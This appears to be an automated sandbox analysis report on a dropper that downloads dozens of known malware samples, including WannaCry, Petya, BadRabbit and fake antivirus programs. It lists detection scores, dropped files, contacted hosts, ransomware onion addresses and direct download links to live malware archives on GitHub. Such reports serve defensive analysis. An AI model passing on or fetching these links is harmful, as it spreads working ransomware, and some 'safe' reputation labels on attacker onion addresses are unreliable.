        C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe100%AviraTR/Ransom.pfnaw
        C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exe100%AviraHEUR/AGEN.1240493
        C:\Users\user\AppData\Local\Temp\1q3rmbaq.p1f\Endermanch@AntivirusPro2017.exe100%AviraTR/AD.FakeRean.mwfxa
        C:\Users\user\AppData\Local\Temp\WindowsUpdate.exe100%AviraTR/Ficongur.dngqe
        C:\ProgramData\vsMwMYIk\LOAcQQUU.exe100%AviraTR/Crypt.XPACK.Gen
        C:\ProgramData\Windows\csrss.exe100%AviraHEUR/AGEN.1240493
        C:\Users\user\AppData\Local\Temp\ca1jm2wg.yla\Endermanch@HappyAntivirus.exe100%AviraPUA/HappyAV.A
        C:\Users\user\AppData\Local\Temp\bsejfx0c.zjs\Endermanch@ViraLock.exe100%AviraTR/Crypt.XPACK.Gen
        C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe100%AviraTR/AD.HiddenTear.huakh
        C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\1q3rmbaq.p1f\Endermanch@AntivirusPro2017.exe100%Joe Sandbox ML
        C:\ProgramData\vsMwMYIk\LOAcQQUU.exe100%Joe Sandbox ML
        C:\ProgramData\Windows\csrss.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\ca1jm2wg.yla\Endermanch@HappyAntivirus.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\bsejfx0c.zjs\Endermanch@ViraLock.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe100%Joe Sandbox ML
        C:\ProgramData\Windows\csrss.exe91%ReversingLabsWin32.Ransomware.Troldesh
        C:\ProgramData\Windows\csrss.exe72%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe88%ReversingLabsByteCode-MSIL.Ransomware.Fantom
        C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe66%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe85%ReversingLabsByteCode-MSIL.Ransomware.Infinity
        C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe60%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exe91%ReversingLabsWin32.Ransomware.Troldesh
        C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exe72%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\1q3rmbaq.p1f\Endermanch@AntivirusPro2017.exe92%ReversingLabsWin32.Rogue.FakeRean
        C:\Users\user\AppData\Local\Temp\1q3rmbaq.p1f\Endermanch@AntivirusPro2017.exe64%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exe91%ReversingLabsWin32.Ransomware.Cerber
        C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exe76%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\WindowsUpdate.exe62%ReversingLabsByteCode-MSIL.Trojan.Ficongur
        C:\Users\user\AppData\Local\Temp\WindowsUpdate.exe46%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\bsejfx0c.zjs\Endermanch@ViraLock.exe95%ReversingLabsWin32.Ransomware.VirLock
        C:\Users\user\AppData\Local\Temp\bsejfx0c.zjs\Endermanch@ViraLock.exe83%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\ca1jm2wg.yla\Endermanch@HappyAntivirus.exe37%ReversingLabsWin32.PUA.HappyAV
        C:\Users\user\AppData\Local\Temp\ca1jm2wg.yla\Endermanch@HappyAntivirus.exe36%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exe95%ReversingLabsWin32.Ransomware.VirLock
        C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exe82%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe92%ReversingLabsWin32.Ransomware.Derialock
        C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe69%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\hntwffjp.nvh\Endermanch@Antivirus.exe86%ReversingLabsWin32.Trojan.CoreGuardAntivirus2009
        C:\Users\user\AppData\Local\Temp\hntwffjp.nvh\Endermanch@Antivirus.exe60%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\m0evjtwp.r3z\Endermanch@AnViPC2009.exe68%ReversingLabsWin32.Rogue.FakeRean
        C:\Users\user\AppData\Local\Temp\m0evjtwp.r3z\Endermanch@AnViPC2009.exe24%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\nsduntxl.sn0\Endermanch@FakeAdwCleaner.exe70%ReversingLabsWin32.Trojan.MintPorcupine
        C:\Users\user\AppData\Local\Temp\nsduntxl.sn0\Endermanch@FakeAdwCleaner.exe60%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\nuxubd5j.5lo\Endermanch@WannaCrypt0r.exe95%ReversingLabsWin32.Ransomware.WannaCry
        C:\Users\user\AppData\Local\Temp\nuxubd5j.5lo\Endermanch@WannaCrypt0r.exe88%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\qi2imphp.fcp\Endermanch@Xyeta.exe92%ReversingLabsWin32.Downloader.Lofog
        C:\Users\user\AppData\Local\Temp\qi2imphp.fcp\Endermanch@Xyeta.exe63%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exe86%ReversingLabsWin32.Ransomware.Genasom
        C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exe78%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\shiAB02.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\shiAB02.tmp0%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\tkkkfnat.fk3\Endermanch@AntivirusPlatinum.exe78%ReversingLabsWin32.Trojan.Pasta
        C:\Users\user\AppData\Local\Temp\tkkkfnat.fk3\Endermanch@AntivirusPlatinum.exe28%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exe93%ReversingLabsWin32.Ransomware.BadRabbit
        C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exe83%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exe100%ReversingLabsWin32.Ransomware.Petya
        C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exe84%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\yz5ggchg.xck\Endermanch@Krotten.exe96%ReversingLabsWin32.Trojan.Krotten
        C:\Users\user\AppData\Local\Temp\yz5ggchg.xck\Endermanch@Krotten.exe86%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\zfaio0hk.qy4\Endermanch@WinlockerVB6Blacksod.exe45%ReversingLabsWin32.Ransomware.InfinityLock
        C:\Users\user\AppData\Local\Temp\zfaio0hk.qy4\Endermanch@WinlockerVB6Blacksod.exe31%MetadefenderBrowse
        C:\Users\user\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\fatalerror.exe50%ReversingLabsWin32.Trojan.Johnnie
        C:\Users\user\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\decoder.dll3%ReversingLabs
        C:\Users\user\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\decoder.dll0%MetadefenderBrowse
        C:\Windows\cscc.dat4%ReversingLabs
        C:\Windows\cscc.dat0%MetadefenderBrowse
        C:\Windows\dispci.exe96%ReversingLabsWin32.Ransomware.BadRabbit
        C:\Windows\dispci.exe86%MetadefenderBrowse
        SourceDetectionScannerLabelLinkDownload
        52.2.Endermanch@PolyRansom.exe.4a0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        47.0.Endermanch@Petya.A.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.jvzjDownload File
        9.0.Endermanch@BadRabbit.exe.d0000.3.unpack100%AviraTR/ATRAPS.GenDownload File
        60.0.LOAcQQUU.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        58.0.dekAkckQ.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        13.2.Endermanch@Cerber5.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
        21.0.Fantom.exe.400000.1.unpack100%AviraTR/AD.HiddenTear.huakhDownload File
        65.0.Endermanch@PolyRansom.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        52.0.Endermanch@PolyRansom.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        13.0.Endermanch@Cerber5.exe.400000.0.unpack100%AviraHEUR/AGEN.1227089Download File
        47.0.Endermanch@Petya.A.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.jvzjDownload File
        13.2.Endermanch@Cerber5.exe.1510000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        21.2.Fantom.exe.400000.0.unpack100%AviraHEUR/AGEN.1242303Download File
        12.2.rundll32.exe.4770000.2.unpack100%AviraHEUR/AGEN.1234590Download File
        11.0.Endermanch@Birele.exe.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        52.2.Endermanch@PolyRansom.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        60.2.LOAcQQUU.exe.6e0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        11.0.Endermanch@Birele.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        21.0.Fantom.exe.400000.2.unpack100%AviraTR/AD.HiddenTear.huakhDownload File
        52.2.Endermanch@PolyRansom.exe.20a0000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        9.0.Endermanch@BadRabbit.exe.d0000.1.unpack100%AviraTR/ATRAPS.GenDownload File
        52.0.Endermanch@PolyRansom.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        9.0.Endermanch@BadRabbit.exe.d0000.2.unpack100%AviraTR/ATRAPS.GenDownload File
        47.0.Endermanch@Petya.A.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.jvzjDownload File
        21.0.Fantom.exe.400000.0.unpack100%AviraTR/AD.HiddenTear.huakhDownload File
        11.2.Endermanch@Birele.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        13.0.Endermanch@Cerber5.exe.400000.2.unpack100%AviraHEUR/AGEN.1227089Download File
        39.0.Endermanch@NoMoreRansom.exe.400000.0.unpack100%AviraHEUR/AGEN.1240493Download File
        60.2.LOAcQQUU.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        47.0.Endermanch@Petya.A.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.jvzjDownload File
        11.0.Endermanch@Birele.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        13.0.Endermanch@Cerber5.exe.400000.3.unpack100%AviraHEUR/AGEN.1227089Download File
        39.2.Endermanch@NoMoreRansom.exe.400000.0.unpack100%AviraTR/Crypt.FKM.GenDownload File
        21.0.Fantom.exe.400000.3.unpack100%AviraTR/AD.HiddenTear.huakhDownload File
        52.0.Endermanch@PolyRansom.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        13.2.Endermanch@Cerber5.exe.4e50000.2.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
        47.2.Endermanch@Petya.A.exe.400000.0.unpack100%AviraHEUR/AGEN.1205487Download File
        9.2.Endermanch@BadRabbit.exe.d0000.0.unpack100%AviraTR/ATRAPS.GenDownload File
        9.0.Endermanch@BadRabbit.exe.d0000.0.unpack100%AviraTR/ATRAPS.GenDownload File
        47.2.Endermanch@Petya.A.exe.5f0000.2.unpack100%AviraHEUR/AGEN.1207445Download File
        13.0.Endermanch@Cerber5.exe.400000.1.unpack100%AviraHEUR/AGEN.1227089Download File
        52.0.Endermanch@PolyRansom.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        11.0.Endermanch@Birele.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://www.jiyu-kobo.co.jp/)0%URL Reputationsafe
        https://render.githubusercontent.com0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/;0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/z0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/t0%URL Reputationsafe
        https://dynamic.t0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/r0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/l0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/h0%URL Reputationsafe
        http://www.fonts.comn0%URL Reputationsafe
        http://www.fonts.comx0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
        http://petya5koahtsf7sv.onion/6zoerS0%Avira URL Cloudsafe
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip0%Avira URL Cloudsafe
        http://192.168.2.1/ic0%Avira URL Cloudsafe
        http://www.fonts.comew0%Avira URL Cloudsafe
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zip0%Avira URL Cloudsafe
        http://www.jiyu-kobo.co.jp/-hu0%VirustotalBrowse
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip0%Avira URL Cloudsafe
        http://www.jiyu-kobo.co.jp/-hu0%Avira URL Cloudsafe
        http://a4ad4ip2xzclh6fd.onionreg.phpprog.phperr.phpcmd.phpsys.phpshd.php?&v=b=i=k=ss=e=c=f=si=sh=shb0%Avira URL Cloudsafe
        http://192.168.2.1/0%Avira URL Cloudsafe
        http://petya5koahtsf7sv.onion/0%Avira URL Cloudsafe
        http://192.168.2.1/(i0%Avira URL Cloudsafe
        https://raw.githubusercontent.comxB0%Avira URL Cloudsafe
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zip0%Avira URL Cloudsafe
        http://collect.installeranalytics.com70%Avira URL Cloudsafe
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip0%Avira URL Cloudsafe
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Antivirus.zip0%Avira URL Cloudsafe
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacks0%Avira URL Cloudsafe
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Xyeta.zip0%Avira URL Cloudsafe
        http://petya37h5tbhyvki.onion/6zoerS0%Avira URL Cloudsafe
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip0%Avira URL Cloudsafe
        https://github.com80%Avira URL Cloudsafe
        http://btc.blo0%Avira URL Cloudsafe
        http://petya37h5tbhyvki.onion/0%Avira URL Cloudsafe
        http://www.fonts.com=wf0%Avira URL Cloudsafe
        http://api.blo0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        google.com
        172.217.168.14
        truefalse
          high
          github.com
          140.82.121.4
          truefalse
            high
            raw.githubusercontent.com
            185.199.108.133
            truefalse
              high
              arizonacode.bplaced.net
              162.55.0.137
              truefalse
                high
                powertoolsforyou.com
                38.238.72.106
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zipfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Xyeta.zipfalse
                    high
                    https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/ViraLock.zipfalse
                      high
                      https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zipfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Krotten.zipfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://yandex.ru/1001false
                        high
                        https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zipfalse
                          high
                          https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Happy%20Antivirus.zipfalse
                            high
                            https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Fantom.zipfalse
                              high
                              http://arizonacode.bplaced.net/HF/SystemLocker/unlock-everybody.txtfalse
                                high
                                http://collect.installeranalytics.com/false
                                  high
                                  https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zipfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zipfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zipfalse
                                    high
                                    https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Antivirus.zipfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/FakeAdwCleaner.zipfalse
                                      high
                                      https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/AnViPC2009.zipfalse
                                        high
                                        https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/WannaCrypt0r.zipfalse
                                          high
                                          https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus.zipfalse
                                            high
                                            https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zipfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Xyeta.zipfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/NoMoreRansom.zipfalse
                                              high
                                              https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/PolyRansom.zipfalse
                                                high
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://github.com/Endermanch/MalwareDatabase/raw/master/trojans/000.zipM1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://192.168.2.1/icrundll32.exe, 0000000C.00000002.347563949.0000000004AF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.jiyu-kobo.co.jp/-huEndermanch@DeriaLock.exe, 00000013.00000003.343064878.000000000565E000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.343956115.0000000005661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • 0%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender%202015.zipJhttps1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://petya5koahtsf7sv.onion/6zoerSEndermanch@Petya.A.exe, 0000002F.00000002.527771418.000000000019C000.00000004.00000010.00020000.00000000.sdmp, DR012.47.drtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.fonts.comewEndermanch@DeriaLock.exe, 00000013.00000003.327064556.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327123356.0000000005685000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.torproject.org/downlo&#097;d/download-easy.html.enEndermanch@Cerber5.exe, 0000000D.00000003.341552127.0000000005125000.00000004.00000800.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://a4ad4ip2xzclh6fd.onionreg.phpprog.phperr.phpcmd.phpsys.phpshd.php?&v=b=i=k=ss=e=c=f=si=sh=shbEndermanch@NoMoreRansom.exe, 00000027.00000002.597891270.00000000005BB000.00000040.00001000.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.torproject.org/Endermanch@Cerber5.exe, 0000000D.00000003.341996956.000000000511A000.00000004.00000800.00020000.00000000.sdmp, Endermanch@NoMoreRansom.exe, 00000027.00000002.526568195.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Endermanch@Petya.A.exe, 0000002F.00000002.558809310.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, DR011.47.drfalse
                                                        high
                                                        https://www.youtube.comEndermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://github.com/Endermanch/MalwareDatabase/raw/master/trojans/TaskILL.zip1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://github.com/Endermanch/MalwareDatabase/raw/master/trojans/TaskILL.zipx1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender%202015.zip1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://petya5koahtsf7sv.onion/Endermanch@Petya.A.exe, 0000002F.00000002.535981944.000000000041B000.00000040.00000001.01000000.00000015.sdmp, Endermanch@Petya.A.exe, 0000002F.00000002.558809310.00000000005F0000.00000040.00001000.00020000.00000000.sdmptrue
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zipZ1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://192.168.2.1/rundll32.exe, 0000000C.00000002.344990142.00000000030BD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.344817594.00000000030AB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.347563949.0000000004AF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://192.168.2.1/(irundll32.exe, 0000000C.00000002.342821374.0000000002FDA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.jiyu-kobo.co.jp/)Endermanch@DeriaLock.exe, 00000013.00000003.343956115.0000000005661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://raw.githubusercontent.comxB1jDe7zWnoe.exe, 00000000.00000002.645523187.0000026280714000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://github.com/Endermanch/MalwareDatabase/raw/master/trojans/000.zip1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://whatismyipaddress.com/Endermanch@NoMoreRansom.exe, 00000027.00000002.597891270.00000000005BB000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000002.609368050.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, Fantom.exe, 00000015.00000002.623940845.0000000002520000.00000004.00000800.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001D.00000002.604216725.0000000002B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://templatesupdates.dlinkddns.com/falssk/fksgieksi.phpFantom.exe, 00000015.00000002.614533949.00000000024E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://diskcryptor.net/rundll32.exe, 0000000C.00000003.314263722.0000000004A41000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.327238742.0000000003073000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.304582247.000000000305C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.314915403.0000000003073000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.344517005.0000000003073000.00000004.00000020.00020000.00000000.sdmp, dispci.exe, 00000024.00000000.331143683.000000000127E000.00000002.00000001.01000000.00000013.sdmp, dispci.exe.12.drfalse
                                                                            high
                                                                            https://render.githubusercontent.com1jDe7zWnoe.exe, 00000000.00000002.625113532.00000262805A9000.00000004.00000800.00020000.00000000.sdmp, 1jDe7zWnoe.exe, 00000000.00000002.624226400.000002628058A000.00000004.00000800.00020000.00000000.sdmp, 1jDe7zWnoe.exe, 00000000.00000002.645523187.0000026280714000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://whatismyipaddress.com///whatismyipaddress.com/ip/ClickEndermanch@NoMoreRansom.exe, 00000027.00000002.597891270.00000000005BB000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/AnVi1jDe7zWnoe.exe, 00000000.00000002.624226400.000002628058A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000005.00000003.309190562.000001E5E5A61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/XFC.zip1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.jiyu-kobo.co.jp/;Endermanch@DeriaLock.exe, 00000013.00000003.343956115.0000000005661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://www.jiyu-kobo.co.jp/zEndermanch@DeriaLock.exe, 00000013.00000003.343956115.0000000005661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://nsis.sf.net/NSIS_ErrorEndermanch@FakeAdwCleaner.exe.0.drfalse
                                                                                      high
                                                                                      http://www.jiyu-kobo.co.jp/tEndermanch@DeriaLock.exe, 00000013.00000003.341610659.0000000005653000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://dynamic.tsvchost.exe, 00000005.00000002.310746113.000001E5E5A64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://www.jiyu-kobo.co.jp/rEndermanch@DeriaLock.exe, 00000013.00000003.343064878.000000000565E000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.343956115.0000000005661000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.341610659.0000000005653000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://www.bplaced.net/impressumEndermanch@DeriaLock.exe, 00000013.00000002.612271253.000000000261D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000005.00000003.309190562.000001E5E5A61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.jiyu-kobo.co.jp/lEndermanch@DeriaLock.exe, 00000013.00000003.343956115.0000000005661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.jiyu-kobo.co.jp/hEndermanch@DeriaLock.exe, 00000013.00000003.343064878.000000000565E000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.343956115.0000000005661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://collect.installeranalytics.com7Error file remover.msi.57.drfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000005.00000003.309277515.000001E5E5A5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
